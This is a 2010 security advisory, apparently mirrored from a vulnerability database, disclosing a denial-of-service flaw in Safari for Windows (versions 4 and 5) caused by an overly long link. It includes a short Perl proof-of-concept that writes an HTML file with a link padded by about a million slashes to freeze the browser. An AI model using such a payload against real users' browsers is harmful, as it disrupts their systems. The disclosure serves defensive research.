Fwd: {Lostmonґs Group} Safari for windows Long link DoS

2010-08-05T00:00:00
ID SECURITYVULNS:DOC:24380
Type securityvulns
Reporter Securityvulns
Modified 2010-08-05T00:00:00

Description

Safari for windows Long link DoS Vendor URL:http://www.apple.com/safari/ Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html Vendor notified:Yes exploit available: YES

Safari is prone vulnerable to Dos with a very long Link... This issue is exploitable via web links like <a href="very long URL"> click here</a> or similar vectors. Safari fails to render the link and it turn Frozen resulting in a Denial of service condition.

Versions Tested

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:

Safari 5.0.X vulnerable Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable Safari 4.xx vulnerable

References

Discovered: 29-07-2010 vendor notify:31-07-2010 Vendor Response: Vendor patch:

Proof Of Concept

!/usr/bin/perl

safari & k-meleon Long "a href" Link DoS

Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com

Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS

generate the file open it with safari wait a seconds

$archivo = $ARGV[0]; if(!defined($archivo)) {

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n"; $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n"; $fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo); print FILE $datos; close(FILE);

exit;

############ EOF

Related Links

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251 Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474 Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

################ Ђnd

Thnx to Phreak for support and let me undestanding the nature of this bug thnx to jajoni for test it in windows 7 X64 bits version.

atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente...